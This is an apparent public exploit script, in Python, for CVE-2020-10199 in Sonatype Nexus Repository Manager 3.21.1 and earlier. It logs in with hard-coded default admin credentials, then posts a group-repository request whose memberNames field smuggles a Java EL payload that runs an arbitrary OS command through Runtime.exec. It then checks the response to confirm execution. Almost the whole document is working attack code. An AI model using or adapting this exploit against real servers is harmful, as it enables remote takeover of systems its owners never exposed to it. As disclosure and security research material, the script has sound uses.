# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated) # Exploit Author: 1F98D # Original Author: Alvaro Muñoz # Date: 27 May 2020 # Vendor Hompage: https://www.sonatype.com/ # CVE: CVE-2020-10199 # Tested on: Windows 10 x64 # References: # https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype # https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype # # Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable # to Java EL injection which allows a low privilege user to remotely # execute code on the target server. # #!/usr/bin/python3 import sys import base64 import requests URL='' CMD='cmd.exe /c calc.exe' USERNAME='admin' PASSWORD='password' s = requests.Session() print('Logging in') body = { 'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'), 'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8') } r = s.post(URL + '/service/rapture/session',data=body) if r.status_code != 204: print('Login unsuccessful') print(r.status_code) sys.exit(1) print('Logged in successfully') body = { 'name': 'internal', 'online': True, 'storage': { 'blobStoreName': 'default', 'strictContentTypeValidation': True }, 'group': { 'memberNames': [ '$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"' ] }, } r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body) if 'java.lang.ProcessImpl' in r.text: print('Command executed') sys.exit(0) else: print('Error executing command, the following was returned by Nexus') print(r.text)